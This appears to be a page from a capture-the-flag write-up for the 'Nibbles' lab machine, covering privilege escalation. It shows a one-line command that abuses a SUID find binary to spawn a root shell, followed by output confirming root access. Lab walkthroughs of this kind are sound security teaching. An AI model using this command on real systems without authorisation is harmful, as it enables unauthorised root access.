🐧
Nibbles
  • Nibbles
    • Summary
  • Enumeration
    • TCP
    • UDP
    • Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
    • Other Services
      • FTP
      • SSH
  • Exploitation
  • Priv Escalation
Powered by GitBook
On this page

Priv Escalation

PreviousExploitation

Last updated 2 years ago

Upon initial enumreation I found that find was running with SUID.

find . -exec /bin/sh -p \; -quit

And we are root!

# whoami
whoami
root
# cat /root/proof.txt
find | GTFOBins
Logo